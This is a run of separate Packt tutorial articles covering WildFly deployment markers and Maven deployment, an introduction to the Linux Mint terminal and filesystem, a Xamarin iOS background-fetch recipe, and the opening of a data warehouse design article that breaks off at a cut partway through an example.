EAR (Enterprise Archive): This type of file is used by Java EE for packaging one or more modules within a single file.
JAR (Java Archive): This is used to package multiple Java classes.
RAR (Resource Adapter Archive): This is an archive file that is defined in the JCA specification as the valid format for deployment of resource adapters on application servers. You can deploy a RAR file on the AS Java as a standalone component or as part of a larger application. In both cases, the adapter is available to all applications using a lookup procedure.

Deployment in WildFly uses deployment file markers that can be identified quickly, both by us and by WildFly, to understand the status of an artifact, that is, whether or not it was deployed. A file marker always has the same name as the artifact it refers to. A basic example: the marker used to request deployment of my-first-app.war is the dodeploy suffix, so a file named my-first-app.war.dodeploy will be created in the deployments directory. Among these markers, there are others, explained as follows:

dodeploy: This suffix is inserted by the user, and indicates that the deployment scanner should deploy the artifact indicated. This marker is mostly important for exploded deployments.
skipdeploy: This marker disables the autodeploy mode while the file is present in the deploy directory, only for the artifact indicated.
isdeploying: This marker is placed by the deployment scanner service to indicate that it has noticed a .dodeploy file, or new or updated autodeploy-mode content, and is in the process of deploying it. This file will be erased by the deployment scanner when the deployment process finishes.
deployed: This marker is created by the deployment scanner to indicate that the content was deployed into the runtime.
failed: This marker is created by the deployment scanner to indicate that the deployment process failed.
isundeploying: This marker is created by the deployment scanner and indicates that the .deployed file was deleted and the content is being undeployed. This marker will be deleted when the undeployment completes.
undeployed: This marker is created by the deployment scanner to indicate that the content was undeployed from the runtime.
pending: This marker is placed by the deployment scanner service to indicate that it has noticed the need to deploy content but has not yet instructed the server to deploy it.

When we deploy our first application, we'll see some of these marker files, making it easier to understand their functions. To support learning, the small applications that I made are available on GitHub (https://github.com) and packaged using Maven (for further details about Maven, you can visit http://maven.apache.org/). To begin the deployment process, we perform a checkout of the first application. First of all, you need to install the Git client for Linux. To do this, use the following command:

[root@wfly_book ~]# yum install git -y

Git is also necessary for the Maven installation, so that it is possible to perform the packaging process of our first application. Maven can be downloaded from http://maven.apache.org/download.cgi.
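As an aside before installing Maven, the marker protocol described above is easy to see in action. The following sketch only simulates it in a scratch directory; no real WildFly scanner is involved, and the file names are just the marker conventions applied to a hypothetical artifact:

```shell
# A scratch directory stands in for $JBOSS_HOME/standalone/deployments.
DEPLOY_DIR=$(mktemp -d)
APP=my-first-app.war

touch "$DEPLOY_DIR/$APP"            # the artifact we want deployed
touch "$DEPLOY_DIR/$APP.dodeploy"   # user: "please deploy this"

# The scanner would replace .dodeploy with .isdeploying and then,
# on success, .deployed; we fake that transition here:
mv "$DEPLOY_DIR/$APP.dodeploy" "$DEPLOY_DIR/$APP.deployed"
ls "$DEPLOY_DIR"

rm "$DEPLOY_DIR/$APP.deployed"      # removing the marker requests undeploy
```

Against a running WildFly, only the `touch` and `rm` steps are yours; the scanner performs the rename itself and would leave `.failed` instead of `.deployed` if the deployment did not succeed.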
Once the download is complete, create a directory that will be used to perform the installation of Maven, and unzip the archive into this directory. In my case, I chose the folder /opt, as follows:

[root@wfly_book ~]# mkdir /opt/maven

Unzip the file into the newly created directory, as follows:

[root@wfly_book maven]# tar -xzvf /root/apache-maven-3.2.1-bin.tar.gz
[root@wfly_book maven]# cd apache-maven-3.2.1/

Run the mvn command; if an error is returned, we must set the M3_HOME environment variable, as described next:

[root@wfly_book ~]# mvn
-bash: mvn: command not found

If the preceding error occurs, it is because the Maven binary was not found by the operating system; in this scenario, we must create and configure the environment variables responsible for this. There are two settings: populate the M3_HOME environment variable with the Maven installation directory, and add Maven's bin directory to the PATH environment variable. Access and edit the /etc/profile file, taking advantage of the configuration that we did earlier with the Java environment variable; this is how it will look with the Maven configuration as well:

#Java and Maven configuration
export JAVA_HOME="/usr/java/jdk1.7.0_45"
export M3_HOME="/opt/maven/apache-maven-3.2.1"
export PATH="$PATH:$JAVA_HOME/bin:$M3_HOME/bin"

Save and close the file, and then run the following command to apply the settings:

[root@wfly_book ~]# source /etc/profile

To verify the configuration, run the following command:

[root@wfly_book ~]# mvn -version

Well, now that we have the necessary tools to check out the application, let's begin. First, set a directory where the application's source code will be saved, as shown in the following commands:

[root@wfly_book opt]# mkdir book_apps
[root@wfly_book opt]# cd book_apps/

Let's check out the project using the git clone command; the repository is available at https://github.com/spolti/wfly_book.git.
Perform the checkout using the following command:

[root@wfly_book book_apps]# git clone https://github.com/spolti/wfly_book.git

Access the newly created directory using the following command:

[root@wfly_book book_apps]# cd wfly_book/

For the first example, we will use the application called app1-v01, so access this directory and build and deploy the project by issuing the following commands. Make sure that the WildFly server is already running. The first build is always very time-consuming, because Maven will download all the necessary libraries to compile the project, the project dependencies, and Maven's own libraries.

[root@wfly_book wfly_book]# cd app1-v01/
[root@wfly_book app1-v01]# mvn wildfly:deploy

For more details about the WildFly Maven plugin, please take a look at https://docs.jboss.org/wildfly/plugins/maven/latest/index.html.

The artifact will be generated and automatically deployed on the WildFly server. Note that a message similar to the following is displayed, stating that the application was successfully deployed:

INFO [org.jboss.as.server] (ServerService Thread Pool -- 29) JBAS018559: Deployed "app1-v01.war" (runtime-name : "app1-v01.war")

When we deploy an artifact, and if we have not configured a virtual host or context root address, then in order to access the application we use the artifact name without the .war suffix as the context root. The structure of the address is http://<your-ip-address>:<port-number>/app1-v01/. In my case, it would be http://192.168.11.109:8080/app1-v01/. See the following screenshot of the application running. This application is very simple, made using JSP, and retrieves some system properties.

Note that in the deployments directory we have a marker file that indicates that the application was successfully deployed, as follows:

[root@wfly_book deployments]# ls -l
total 20
-rw-r--r--. 1 wildfly wildfly 2544 Jan 21 07:33 app1-v01.war
-rw-r--r--. 1 wildfly wildfly   12 Jan 21 07:33 app1-v01.war.deployed
-rw-r--r--. 1 wildfly wildfly 8870 Dec 22 04:12 README.txt

To undeploy the application without removing the artifact, we need only remove the app1-v01.war.deployed file. This is done using the following commands:

[root@wfly_book ~]# cd $JBOSS_HOME/standalone/deployments
[root@wfly_book deployments]# rm app1-v01.war.deployed
rm: remove regular file `app1-v01.war.deployed'? y

In the previous command, you will need to press Y to confirm removing the file. You can also use the WildFly Maven plugin for undeployment, using the following command:

[root@wfly_book deployments]# mvn wildfly:undeploy

Notice that the log reports that the application was undeployed, and also that a new marker, .undeployed, has been added, indicating that the artifact is no longer active in the runtime server:

INFO [org.jboss.as.server] (DeploymentScanner-threads - 1) JBAS018558: Undeployed "app1-v01.war" (runtime-name: "app1-v01.war")

And run the following command:

[root@wfly_book deployments]# ls -l
total 20
-rw-r--r--. 1 wildfly wildfly 2544 Jan 21 07:33 app1-v01.war
-rw-r--r--. 1 wildfly wildfly   12 Jan 21 09:44 app1-v01.war.undeployed
-rw-r--r--. 1 wildfly wildfly 8870 Dec 22 04:12 README.txt

If you undeploy using the WildFly Maven plugin, the artifact will be deleted from the deployments directory.

Summary

In this article, we learned how to configure an application using a virtual host and the context root, and also how to use the available logging tools with Java in some of our test applications, among several other very interesting settings.

Resources for Article:

Further resources on this subject:

JBoss AS Perspective [Article]
JBoss EAP6 Overview [Article]
JBoss RichFaces 3.3 Supplemental Installation [Article]

Packt
21 May 2014
19 min read

An Introduction to the Terminal

(For more resources related to this topic, see here.)

Why should we use the terminal?

With Mint containing a complete suite of graphical tools, one may wonder why it is useful to learn and use the terminal at all. Depending on the type of user, learning how to execute commands in a terminal may or may not be beneficial. If you are a user who intends to use Linux only for basic purposes such as browsing the Internet, checking e-mail, playing games, editing documents, printing, watching videos, listening to music, and so on, terminal commands may not be a useful skill to learn, as all of these activities (as well as others) are best handled by a graphical desktop environment.

However, the real value of the terminal in Linux comes with advanced administration. Some administrative activities are faster using shell commands than using the GUI. For example, if you wanted to edit the /etc/fstab file, it would take fewer steps to type sudo nano /etc/fstab than it would to open a file manager with root permissions, navigate to the /etc directory, find the fstab file, and click on it to open it. This is especially true if all you want to do is make a quick change. Similarly, typing sudo apt-get install geany may be faster if you already know the name of the package you want, compared to opening the Mint Software Manager, waiting for it to load, finding the geany package, and installing it. On older and slower systems, the overhead caused by graphical programs may delay execution time.

Another value of the Linux shell is scripting. With a script, you can create a text file with a list of commands and instructions and execute all of the commands it contains in a single run. For example, you can create a list of packages that you would prefer to install on your system, type them out in a text file, and add your distribution's package installation command at the beginning of the list. Now, you can install all of your favorite programs with a single command.
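Such a script might look like the following sketch. The package names are only illustrative, and the command is built into a variable and echoed first so the script is a safe dry run; replace the final `echo "$CMD"` with `$CMD` to actually install:

```shell
#!/bin/bash
# Install a personal list of favorite packages in one run.
# Package names below are examples; substitute your own.
PACKAGES="geany vlc gimp git"
CMD="sudo apt-get install -y $PACKAGES"
echo "$CMD"   # dry run; change to $CMD to install for real
```

Saved as, say, setup.sh and made executable with chmod +x, this is exactly the kind of script you could rerun after a fresh installation.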
If you save this script for later, you can execute it any time you reinstall Linux Mint and immediately have access to all your favorite programs. If you are administering a server, you can create a script to check the overall health of the system at various times, check for security intrusions, or even configure servers to send you weekly reports on just about anything you'd like to stay updated on. There are entire books dedicated to scripting, so we won't go into detail about it in this article. However, by the end of the article, we will create a script to demonstrate how it is done.

Accessing the shell

When it comes to Linux, there is very rarely (if ever) a single way to do anything. Just as you have your pick of desktop environments, text editors, browsers, and just about anything else, you also have a choice when it comes to accessing a Linux terminal to execute shell commands. As a matter of fact, you even have a choice of which terminal emulator to use to interpret your commands.

Linux Mint comes bundled with an application called the GNOME Terminal. This application was actually developed for a completely different desktop environment (GNOME) but is included in Mint because the Mint developers did not create their own terminal emulator for Cinnamon. The GNOME Terminal does the job very well, so there was no need to reinvent the wheel. Once you open the GNOME Terminal, it is ready to do your bidding right away. The following screenshot shows the GNOME Terminal, ready for action:

As mentioned earlier, other terminal emulators are available. One popular choice is Konsole, which typically comes bundled with Linux distributions that feature the KDE environment (such as Mint's own KDE edition). In addition, there is xfce4-terminal, which comes bundled with the Xfce environment.
Although each terminal emulator is generally geared toward the desktop environment that features it, nothing stops you from installing another if you find that the GNOME Terminal doesn't suit your needs. Each terminal emulator functions in much the same way, and you may not notice much of a difference, especially when you're starting out.

You may be wondering what exactly a terminal emulator is. A terminal emulator is a windowed application that runs in a graphical environment (such as Cinnamon in Mint) and provides a terminal window through which you can execute shell commands to interact with the system. In essence, a terminal emulator is emulating what a full-screen terminal would look like, but in an application window. Each terminal emulator in Linux lets you interact with your distribution's chosen shell, and because the various terminal emulators all talk to the same shell, you won't notice anything unique about how commands run in each of them. The differences between one terminal emulator and another usually come down to features of the graphical user interface surrounding the terminal window, such as the ability to open new terminal windows in tabs instead of separate instances, or transparent windows that let you see what is behind your terminal as you type.

While learning about Linux, you'll often hear the term Bash when referring to the shell. Bash is the command interpreter that Linux uses by default; however, there are several others, including (but not limited to) the C shell, the Dash shell, and the Korn shell. When you interact with your Linux distribution through a terminal emulator, you are actually interacting with its shell. Bash itself is a successor to the Bourne shell (originally created by Stephen Bourne) and is an acronym for "Bourne Again Shell."
Virtually all distributions include Bash as their default shell; it is the closest thing Linux has to a standard shell. As you start out on your Linux journey, Bash is the only shell you need to concern yourself with and the only shell covered in this article. Scripts are generally written against the shell environment in which they are intended to run. This is why, when you read about writing scripts in Linux, you'll see them referred to as Bash scripts: Bash is the target shell and pretty much the standard Linux shell.

In addition, terminal emulators aren't the only way to access the Linux shell for entering commands. In fact, you don't even need to install a terminal emulator. You can use TTY (Teletype) terminals, which are full-screen terminals available for your use by simply pressing a combination of keys on your keyboard. When you switch to a TTY terminal, you switch away from your desktop environment to a dedicated text-mode console. You can access a TTY terminal by pressing Alt + Ctrl and one of the function keys (F1 through F6) at the same time. To switch back to Cinnamon, press Alt + Ctrl + F8.

Not all distributions handle TTY terminals in the same way. For example, some start the desktop environment on TTY 7 (Alt + Ctrl + F7), and others may have a different number of TTYs available. If you are using a different flavor of Mint and Alt + Ctrl + F8 doesn't bring you back to your desktop environment, try Alt + Ctrl + F7 instead.

You should notice that the terminal number changes each time you switch between TTY terminals. For example, if you press Alt + Ctrl + F1, you should see a heading similar to Linux Mint XX ReleaseName HostName tty1 (notice the tty number at the end). If you press Alt + Ctrl + F2, you'll see a heading similar to Linux Mint XX ReleaseName HostName tty2. The TTY number corresponds to the function key you used to access it.
The benefit of a TTY is that it is an environment separate from your desktop environment, where you can run commands and large jobs. You can have a separate command running in each TTY, each independent of the others, without occupying space in your desktop environment. Not everyone will find TTYs useful, however; it all depends on your use case and personal preferences.

Regardless of how you access a terminal in Linux to practice entering your commands, all the examples in this article will work fine. In fact, it doesn't even matter whether you use the bundled GNOME Terminal or another terminal emulator. Feel free to play around, as each of them handles commands in the same way and will work fine for the purposes of this article.

Executing commands

While utilizing the shell and entering commands, you will find yourself in a completely different world compared to your desktop environment. While using the shell, you'll enter a command, wait for confirmation that the command was successful (if applicable), and then be brought back to the prompt so that you can execute another command. In many cases, the shell simply returns to the prompt with no output; this constitutes success. Be warned, though: the Linux shell makes no assumptions. If you type something incorrectly, you will either see an error message or produce unexpected output. If you tell the shell to delete a file and you direct it at the wrong one, it typically won't prompt for confirmation and will bypass the trash folder. The Linux shell does exactly what you tell it to, not necessarily what you want it to. Don't let that scare you, though. The Linux shell is very logical and easy to learn. However, with great power comes great responsibility.

To get started, open your terminal emulator. You can either open the GNOME Terminal (you will find it in the application menu under Accessories, or pinned to the left pane of the application menu by default) or switch to a TTY by pressing Alt + Ctrl + F1.
You'll see a prompt that looks similar to the following:

username@hostname ~ $

Let's take a moment to examine the prompt. The first part displays the username that commands will be executed as. When you first open a terminal, it runs under the user account that opened it. The second part of the prompt is the host name of the computer, which is whatever you named it during the installation. Next, the path is displayed. In the preceding example, it's simply a tilde (~). The ~ character in Linux represents the currently logged-in user's home directory; thus, in the preceding prompt, the current directory that the prompt is attached to is the user's home directory. Finally, a dollar sign ($) is displayed. This indicates that commands will run as a normal user and not as the root user.

For example, suppose a user named C. Norris is using a machine named Neptune. This user opens a terminal and then switches to the /media directory. The prompt would then look like the following:

cnorris@neptune /media $

Now that we understand the prompt, let's walk through some very basic commands in the following steps. Later in the article, we'll go over more complete examples; for now, let's take the terminal out for a spin.

Open a prompt, type pwd, and press Enter. The pwd command stands for print working directory. The output displays the complete path that the terminal is attached to. If you ever lose your way, the pwd command will save the day. Notice that the command prints the working directory and then completes, returning you right back to the prompt, ready to accept another command.

Next, try the ls command (that's "L" and "S", both lowercase). It is short for list. When you execute the ls command, you should see a list of the files saved in your current working directory.
If there are no files in your working directory, you'll see no output. For a little bit of fun, try the following command:

cowsay Linux Mint is Awesome

This command shows that the Mint developers have a sense of humor and included the cowsay program in the default Mint installation. You can make the cow say anything you'd like, but be nice. The following screenshot shows the output of the preceding cowsay command, included in Mint for laughs:

Navigating the filesystem

Before we continue with more advanced terminal usage, it's important to understand how the filesystem is laid out in Linux as well as how to navigate it. First, we must clarify what exactly is meant by the term "filesystem", as it can refer to different things depending on the context. If you recall, when you installed Linux Mint, you formatted one or more partitions with a filesystem, most likely ext4. In that context, we're referring to the type of formatting applied to a hard disk partition. There are many different filesystems available for formatting hard disk partitions, and this is true of all operating systems. In the context of this article, however, filesystem refers to the default system of directories (also known as folders) in a Linux installation and how to navigate from one folder to another.

The filesystem in an installed Linux system includes many different folders, each with its own purpose. In order to understand how to navigate between directories in a Linux filesystem, you should first have a basic understanding of what the folders are for. You can view the default directory structure in the Linux filesystem in one of the following two ways: One way is to open the Nemo file manager and click on File System on the left-hand side of the window.
This will open a view of the default folders in Linux, as shown in the following screenshot:

Alternatively, you can execute the following command from your terminal emulator:

ls -l /

The following screenshot shows the output of the preceding command from the root of the filesystem:

The first point to understand, especially if you're coming from Windows, is that there is no drive lettering in Linux. This means that there is no C drive for your operating system or D drive for your optical drive. The closest thing the Linux filesystem has to a C: drive is a single forward slash (/), which represents the beginning of the filesystem. In Linux, everything is a subdirectory of /. When we executed the preceding command (ls -l /), we told the shell that we'd like a listing of /, the beginning of the drive. The -l flag requests a long listing: one entry per line with details, rather than the default multi-column output.

Paths are written as shown in the following example, which references the Music directory under Joe's home directory:

/home/joe/Music

The first forward slash references the beginning of the filesystem. If a path in Linux starts with a single forward slash, the path starts at the beginning of the drive. In the preceding example, starting at the beginning of the filesystem, we find a directory there named home. Inside the home folder, there is another directory named joe, and inside the joe directory, we find another directory named Music.

The cd command is used to change from the current working directory to the one that we want to work with. Let's demonstrate this with an example. First, let's say that the prompt Joe sees in his terminal is the following:

joe@Mint ~ $

From this, we can deduce that the current working directory is Joe's home directory. We know this because the ~ character is shorthand for the user's home directory.
Let's assume that Joe types the following:

pwd

His output will be as follows:

/home/joe

In his case, ~ is the same as /home/joe. Since Joe is currently in his home directory, he can see the contents of that directory by simply typing the following command:

ls

The Music directory that Joe wants to access would be shown in the output, as its path is /home/joe/Music. To change the working directory of the terminal to /home/joe/Music, Joe can type the following:

cd /home/joe/Music

His prompt will change to the following:

joe@Mint ~/Music $

However, the cd command does not make you type the full path. With cd, you can type an absolute or a relative path. In the preceding command, we referenced an absolute path: a path from the beginning of the disk (the single forward slash), with each directory from the beginning completely typed out. In this example, it's unnecessary to type the full path because Joe is already in his home directory. As Music is a subdirectory of the directory he's already in, all he has to do is type the following command to get to his Music directory:

cd Music

That's it. Without a leading forward slash, the command interpreter understands that we are referencing a directory inside the current working directory. If Joe were to use /Music as the path instead, it wouldn't work, because there is no Music directory at the top level of his hard drive. If Joe wants to go back one level, he can enter the following command:

cd ..

Typing the cd command followed by a space and two periods tells the command interpreter that we would like to move up to the level above the one where we currently are. In this case, the command returns Joe to his home directory.
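The whole exchange above can be reproduced in any terminal. The sketch below uses a throwaway directory tree under /tmp instead of Joe's home directory, so it is safe to run anywhere:

```shell
# Create a small directory tree to practice on.
mkdir -p /tmp/demo/Music

cd /tmp/demo       # absolute path: begins with /
pwd                # prints /tmp/demo

cd Music           # relative path: resolved against the current directory
pwd                # prints /tmp/demo/Music

cd ..              # note the space before the two periods
pwd                # prints /tmp/demo
```

When you are done experimenting, rm -r /tmp/demo removes the practice tree.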
Finally, as if the two meanings of "filesystem" weren't confusing enough, there is another key Linux term whose meaning changes depending on the context in which you use it. The word is root. The user account named root is present on all Linux systems. The root account is the Alpha and Omega of the Linux system. The root user has the most permissions of any user on the system; root could even delete the entire filesystem and everything contained within it. Therefore, it's generally discouraged to use the root account, for fear of a typo destroying your entire system. However, in this article, when we talk about root, we're not talking about the root user account. There are two other meanings of the word root in Linux with regard to the filesystem.

First, you'll often hear someone refer to the root of the filesystem. They are referring to the single forward slash that represents the beginning of the filesystem. Second, there is a directory in the root of the filesystem named root. Its path is as follows:

/root

Linux administrators will refer to that directory as "slash root", indicating that it is a directory called root, stored in the root (beginning) of the filesystem. So, what is the /root directory? The /root directory is the home directory for the root account. In this article, we have referred to the /home directory several times. In a Linux system, each user gets their own directory underneath /home: David's home directory would be /home/david, and Cindy's home directory is likely to be /home/cindy. (Using lowercase for all usernames is common practice among Linux administrators.) Notice, however, that there is no /home/root. The root account is special, and it does not have a home directory in /home as normal users do.
/root is basically the equivalent of a home directory for root. The /root directory is not accessible to ordinary users. For example, try the following command:

ls /root

The ls command by itself displays the contents of the current working directory. However, if we pass a path to ls, we're telling ls that we want to list the contents of a different directory; in the preceding command, we're requesting a listing of the /root directory. Unfortunately, we can't. The root account does not want its directories visible to mortal users. If you execute the command, it will give you an error message indicating that permission was denied.

Like many Ubuntu-based distributions, Mint actually disables the root account. Even though it's disabled, the /root directory still exists, and the root account can be used, but not logged in to directly. The takeaway is that you cannot log in directly as root.

So far, we've covered the /home and /root subdirectories of /, but what about the rest? We'll close this section of the article with a brief description of what each directory is used for. Don't worry; you don't have to memorize them all. Just use this section as a reference.

/bin: This stores essential commands accessible to all users. The executables for commands such as ls are stored here.

/boot: This stores the configuration information for the boot loader as well as the initial ramdisk for the boot sequence.

/dev: This holds device files that represent pieces of hardware, such as hard drives and sound cards.

/etc: This stores the configuration files used by the system. Examples include the configuration for Samba, which handles cross-platform networking, and the fstab file, which stores mount points for hard disks.

/home: As discussed earlier in the article, each user account gets its own directory underneath this directory for storing personal files.

/lib: This stores the libraries needed by other binaries.
/media: This directory serves as a place for removable media to be mounted. If you insert media (such as a flash drive), you'll find it underneath this directory.

/mnt: This directory is used for manual mount points; /media is generally used instead, and this directory still exists as a holdover from the past.

/opt: Additional programs can be installed here.

/proc: Within /proc, you'll find virtual files that represent processes and kernel data.

/root: This is the home directory for the root account.

/sbin: This consists of superuser program binaries.

/tmp: This is a place for temporary files.

/usr: This is a directory where utilities and applications can be stored for use by all users, but it is not modified directly by users other than the root user.

/var: This is a directory where continually changing files, such as printer spools and logs, are stored.
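Since every path in the list above is part of the standard layout, you can check which of them exist on your own system with a short loop (a sketch; the list is taken directly from the directories described above):

```shell
# Check which of the standard top-level directories are present.
for dir in /bin /boot /dev /etc /home /lib /media /mnt /opt /proc /root /sbin /tmp /usr /var; do
    if [ -d "$dir" ]; then
        echo "$dir exists"
    fi
done
```

On a default Mint installation, every directory in the list should be reported; on other systems, a missing entry simply means that distribution laid things out slightly differently.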
Updating data in the background

Packt
20 May 2014
4 min read
(For more resources related to this topic, see here.)

Getting ready

Create a new Single View Application in Xamarin Studio and name it BackgroundFetchApp. Add a label to the controller.

How to do it...

Perform the following steps:

We need access to the label from outside of the scope of the BackgroundFetchAppViewController class, so create a public property for it as follows:

public UILabel LabelStatus {
  get { return this.lblStatus; }
}

Open the Info.plist file and, under the Source tab, add the UIBackgroundModes key (Required background modes) with the string value fetch. The following screenshot shows the editor after it has been set:

In the FinishedLaunching method of the AppDelegate class, enter the following line:

UIApplication.SharedApplication.SetMinimumBackgroundFetchInterval(
  UIApplication.BackgroundFetchIntervalMinimum);

Enter the following code, again in the AppDelegate class:

private int updateCount;

public override void PerformFetch (UIApplication application,
  Action<UIBackgroundFetchResult> completionHandler)
{
  try {
    HttpWebRequest request =
      WebRequest.Create("http://software.tavlikos.com") as HttpWebRequest;
    using (StreamReader sr = new StreamReader(
      request.GetResponse().GetResponseStream())) {
      Console.WriteLine("Received response: {0}", sr.ReadToEnd());
    }
    this.viewController.LabelStatus.Text =
      string.Format("Update count: {0}\n{1}", ++updateCount, DateTime.Now);
    completionHandler(UIBackgroundFetchResult.NewData);
  } catch {
    this.viewController.LabelStatus.Text =
      string.Format("Update {0} failed at {1}!", ++updateCount, DateTime.Now);
    completionHandler(UIBackgroundFetchResult.Failed);
  }
}

Compile and run the app on the simulator or on the device. Press the home button (or Command + Shift + H) to move the app to the background and wait for an output. This might take a while, though.

How it works...

The UIBackgroundModes key with the fetch value enables the background fetch functionality for our app. Without setting it, the app will not wake up in the background.
After setting the key in Info.plist, we override the PerformFetch method in the AppDelegate class, as follows:

public override void PerformFetch (UIApplication application, Action<UIBackgroundFetchResult> completionHandler)

This method is called whenever the system wakes up the app. Inside this method, we can connect to a server and retrieve the data we need. An important thing to note here is that we do not have to use iOS-specific APIs to connect to a server. In this example, a simple HttpWebRequest is used to fetch the contents of this blog: http://software.tavlikos.com.

After we have received the data we need, we must call the callback that is passed to the method, as follows:

completionHandler(UIBackgroundFetchResult.NewData);

We also need to pass the result of the fetch. In this example, we pass UIBackgroundFetchResult.NewData if the update is successful and UIBackgroundFetchResult.Failed if an exception occurs. If we do not call the callback within the specified amount of time, the app will be terminated. Furthermore, it might get fewer opportunities to fetch data in the future.

Lastly, to make sure that everything works correctly, we have to set the interval at which the app will be woken up, as follows:

UIApplication.SharedApplication.SetMinimumBackgroundFetchInterval(
  UIApplication.BackgroundFetchIntervalMinimum);

The default interval is UIApplication.BackgroundFetchIntervalNever, so if we do not set an interval, the background fetch will never be triggered.

There's more...

Apart from the functionality we added in this project, the background fetch is completely managed by the system. The interval we set is merely an indication, and the only guarantee we have is that the fetch will not be triggered sooner than the interval. In general, the system monitors the usage of all apps and triggers the background fetch according to how often each app is used. Apart from the predefined values, we can pass any value we want, in seconds.
UI updates

We can update the UI in the PerformFetch method. iOS allows this so that the app's screenshot is updated while the app is in the background. However, note that we need to keep UI updates to the absolute minimum.

Summary

Thus, this article covered the things to keep in mind to make use of iOS 7's background fetch feature.

Resources for Article:

Further resources on this subject:

Getting Started on UDK with iOS [Article]
Interface Designing for Games in iOS [Article]
Linking OpenCV to an iOS project [Article]
Data Warehouse Design

Packt
20 May 2014
14 min read
(For more resources related to this topic, see here.)

Most companies have established, or are planning to establish, a Business Intelligence system and a data warehouse (DW). Knowledge of BI and data warehousing is in great demand in the job market. This article gives you an understanding of what Business Intelligence and a data warehouse are, what the main components of a BI system are, and what the steps to create a data warehouse are. It focuses on the design of the data warehouse, which is the core of a BI system. A data warehouse is a database designed for analysis, and this definition indicates that designing a data warehouse is different from modeling a transactional database. Designing the data warehouse is also called dimensional modeling. In this article, you will learn about the concepts of dimensional modeling.

Understanding Business Intelligence

Based on Gartner's definition (http://www.gartner.com/it-glossary/business-intelligence-bi/), Business Intelligence is defined as follows:

Business Intelligence is an umbrella term that includes the applications, infrastructure and tools, and best practices that enable access to and analysis of information to improve and optimize decisions and performance.

As the definition states, the main purpose of a BI system is to help decision makers make proper decisions based on the results of data analysis provided by the BI system. Nowadays, there are many operational systems in each industry. Businesses use multiple operational systems to simplify, standardize, and automate their everyday jobs and requirements. Each of these systems may have its own database; some may work with SQL Server, some with Oracle. Some legacy systems may work with legacy databases or even file operations. There are also systems that work through the Web via web services and XML.
Operational systems are very useful for day-to-day business operations, such as hiring a person in the human resources department, selling through a retail store, and handling financial transactions. The rising number of operational systems also adds another requirement: integrating those systems together. Business owners and decision makers not only need integrated data but also require analysis of the integrated data. As an example, it is a common requirement for the decision makers of an organization to compare their hiring rate with the level of service provided by the business and the customer satisfaction based on that level of service. As you can see, this requirement deals with multiple operational systems, such as CRM and human resources. It might also need data from sales and inventory if the decision makers want to bring those factors into their decisions. As a supermarket owner or decision maker, it would be very important to understand which products in which branches were in higher demand. This kind of information helps you provide enough products to cover demand, and you may even think about opening another branch in some regions.

The requirement to integrate multiple operational systems in order to create consolidated reports and dashboards that help decision makers make proper decisions is the main driver for Business Intelligence. Some organizations and businesses use ERP systems that are already integrated, so you may wonder whether there is any need for data integration at all, given that consolidated reports can be produced easily from these systems. Do such organizations still require a BI solution? The answer, in most cases, is yes. A company might not require a separate BI system for the internal parts of its operations implemented through the ERP.
However, it might require data from outside, for example, from another vendor's web service or through many other protocols and channels for sending and receiving information. This creates a requirement for consolidated analysis of such information, which brings the BI requirement back to the table.

The architecture and components of a BI system

After understanding what a BI system is, it's time to discover more about its components and understand how these components work with each other. There are also BI tools that help implement one or more of these components. The following diagram shows an illustration of the architecture and main components of a Business Intelligence system:

The BI architecture and components differ based on the tools, environment, and so on. The architecture shown in the preceding diagram contains components that are common to most BI systems. In the following sections, you will learn more about each component.

The data warehouse

The data warehouse is the core of the BI system. A data warehouse is a database built for the purpose of data analysis and reporting, and this purpose changes the design of the database as well. As you know, operational databases are built on normalization standards, which are efficient for transactional systems, for example, to reduce redundancy. As a result, a 3NF-designed database for a sales system contains many tables related to each other, so a report on sales information may involve more than 10 joins, which slows down the response time of the query and the report. A data warehouse uses a different design that reduces the response time and increases the performance of queries for reports and analytics. You will learn more about the design of a data warehouse (which is called dimensional modeling) later in this article.
Extract Transform Load

It is very likely that more than one system acts as a source of the data required by the BI system. So there is a requirement for data consolidation that extracts data from the different sources, transforms it into the shape that fits the data warehouse, and finally loads it into the data warehouse; this process is called Extract Transform Load (ETL). There are many challenges in the ETL process, some of which will be revealed (conceptually) later in this article.

ETL is not just a simple data integration phase. Let's explore it with an example: in an operational sales database, you may have dozens of tables that hold sales transaction data. When you design that sales data into your data warehouse, you can denormalize it and build one or two tables for it. The ETL process should therefore extract data from the sales database and transform it (combine, match, and so on) to fit the model of the data warehouse tables.

There are several ETL tools on the market that perform the extract, transform, and load operations. The Microsoft solution for ETL is SQL Server Integration Services (SSIS), which is one of the best ETL tools available. SSIS can connect to multiple data sources such as Oracle, DB2, text files, XML, web services, SQL Server, and so on. SSIS also has many built-in transformations to transform the data as required.

Data model – BISM

A data warehouse is designed to be the source of analysis and reports, so it works much faster than operational systems for producing reports. However, a DW is not fast enough to cover all requirements, because it is still a relational database, and databases have many constraints that reduce the response time of a query. The requirement for faster processing and lower response times on one hand, and for aggregated information on the other, leads to the creation of another layer in BI systems.
This layer, which we call the data model, contains a file-based or memory-based model of the data that produces very quick responses to reports. Microsoft's solution for the data model is split into two technologies: the OLAP cube and the in-memory tabular model. The OLAP cube is file-based data storage that loads data from a data warehouse into a cube model. The cube contains descriptive information as dimensions (for example, customer and product) and cells (for example, facts and measures, such as sales and discount). The following diagram shows a sample OLAP cube:

In the preceding diagram, the cube has three dimensions: Product, Customer, and Time. Each cell in the cube is a junction of these three dimensions. For example, if we store the sales amount in each cell, then the green cell shows that Devin paid $23 for a Hat on June 5. Aggregated data can be fetched easily within the cube structure as well. For example, the orange set of cells shows how much Mark paid on June 1 for all products. As you can see, the cube structure makes it easier and faster to access the required information.

Microsoft SQL Server Analysis Services 2012 comes with two different types of modeling: multidimensional and tabular. Multidimensional modeling is based on the OLAP cube and is fitted with measures and dimensions, as you can see in the preceding diagram. The tabular model is based on a new in-memory engine for tables. The in-memory engine loads all data rows from tables into memory and responds to queries directly from memory, which gives a very fast response time. The BI Semantic Model (BISM) provided by Microsoft is the combination of the SSAS Tabular and Multidimensional solutions.

Data visualization

The frontend of a BI system is data visualization. In other words, data visualization is the part of the BI system that users see.
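Returning to the OLAP cube illustration for a moment, its cell lookup and aggregation can be sketched with a plain Python dictionary keyed by the three dimensions. Only the $23 Hat sale by Devin on June 5 comes from the text; the other cells are made-up values that give the aggregation something to sum:

```python
# A toy "cube": each cell is addressed by its junction of the three
# dimensions from the diagram -- Product, Customer, and Time.
cube = {
    ("Hat",   "Devin", "June 5"): 23,   # the green cell from the text
    ("Hat",   "Mark",  "June 1"): 15,   # made-up values below
    ("Shoes", "Mark",  "June 1"): 40,
    ("Shoes", "Devin", "June 2"): 55,
}

# Single-cell lookup: what did Devin pay for a Hat on June 5?
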